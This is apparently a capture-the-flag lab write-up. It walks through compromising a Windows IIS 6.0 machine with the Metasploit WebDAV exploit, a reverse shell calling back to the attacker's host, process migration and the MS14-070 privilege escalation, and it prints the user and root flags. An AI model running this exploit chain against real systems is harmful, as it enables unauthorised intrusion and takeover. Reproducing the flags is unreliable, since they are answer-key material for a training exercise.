As usual let's start with nmap:
nmap -sV -sC 10.129.95.233
We can see that port 80 is open so let's check the website. Open your browser and type in the url bar : 10.129.95.233
Let's do a curl to get more info:
curl -I 10.129.95.233
We can see that the web server is on Microsoft-IIS/6.0.
I googled "IIS6 exploit" and found this article from rapid7:
Let's follow the steps in the article.
First, open a new command prompt and type the following to load metasploit:
msfconsole
As per the article let's type:
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
show options
We need to set LHOST and RHOSTS as they are required fields.
LHOST (local host) should be set with the IP of your machine. If you don't know the IP of your machine, you can find out using ifconfig. My machine's IP is 10.10.14.21, yours will be different.
set LHOST 10.10.14.21
RHOST (remote host) is the target machine's IP:
set RHOSTS 10.129.95.233
exploit
It worked!
shell
whoami
We are nt authority\network service
Great!
The shell is not great though. We need to escalate our privileges now.
Lets exit to return to the meterpreter shell
exit
Privilege Escalation
Let's use Lester, or Exploit Suggester. Lester is a module that scan the target for vulnerabilities. It is not actively exploiting them though, just scanning for them. However, you need to have a session opened on the target already to be able to use Lester. But we have a session already so let's try this.
run post/multi/recon/local_exploit_suggester
We get several exploits - let's pick exploit/windows/local/ms14_070_tcpip_ioctl
But first, let's see what processes are running on the target machine:
ps
We need to find a process that is running under NT AUTHORITY\NETWORK SERVICE
Let's pick davcdata.exe
ps | grep dav
The process ID for davcdata.exe is PID 2768
Let's migrate to this process using:
migrate 2768
background
This tells us it is session 1
use exploit/windows/local/ms14_070_tcpip_ioctl
set session 1
show options
set LHOST 10.10.14.21
exploit
It worked!!
shell
cd C:\Documents and Settings\Harry\Desktop
dir
type user.txt
bdff5ec67c3cff017f2bedc146a5d869
Congratulations! You found the user flag!
cd C:\Documents and Settings\Administrator\Desktop
dir
type root.txt
9359e905a2c35f861f6a57cecf28bb7b
Congratulations! You found the root flag!
Kommentare